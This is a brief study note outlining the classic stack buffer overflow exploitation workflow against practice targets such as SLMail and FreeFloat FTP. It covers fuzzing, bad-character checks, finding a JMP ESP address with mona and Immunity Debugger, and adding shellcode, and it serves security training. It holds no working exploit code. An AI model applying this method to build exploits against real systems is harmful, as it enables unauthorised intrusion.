Buffer Overflow
Last updated
Last updated
Buffer overflow practice machines https://github.com/freddiebarrsmith/Buffer-Overflow-Exploit-Development-Practice
Slmail55 https://www.exploit-db.com/apps/12f1ab027e5374587e7e998c00682c5d-SLMail55_4433.exe
Floatftp https://www.exploit-db.com/apps/687ef6f72dcbbf5b2506e80a375377fa-freefloatftpserver.zip
minishare https://www.exploit-db.com/apps/0ffe5385147edd1f9e7b460c6d7cb0a6-minishare-1.4.1.zip
1. Attach debugger
2. Fuzz and check # of As to crash it
3. Check for enough buffer for exploit (about 350 - 400 bytes)
4. Check for bad characters (remove bad characters from script for each iterations to test)
5. Check JMP ESP
a. !mona modules
- find modules with no bad charcters in address (no null bytes) eg. x5f400000
and has no DEP, ASLR protection
b. Select it and click 'e' for executable modules list then double click the module
c. Search for jump esp instruction, rightclick > search for > command > jmp esp
d. (OR) rightclick > search for > sequence of commands > "push esp" (enter) "retn"
(OR) look for executable parts of dll instructions eg.
Note: Because in SLMail example the dll SLMFC is not protected by DEP and ASLR, we could use any part of the SLMFC dll (eg. Text,data,rdata etc) and not just limited to the 'Executable' part of SLMFC's .text section
e. Using the command !mona find -s "\xff\xe4" -m <dll name>
Search for the jmp esp address (look for no badcharacters in address)
f. Verify if address contain JMP ESP. Rightclick and copy to clipboard address. Click on icon to go to address
6. Verifing JMP ESP
a. Add address IN REVERSE to buffer overflow script b. Set breakpoint on JMP ESP using F2 in immunity debbuger and run
c. Right click ESP address and click follow in dump
to verify that the next executing set of instructions are indeed CCCC....
(clicking F7) will continue program flow to the "CCCCC…."
7. Finally Adding shellcode to buffer overflow script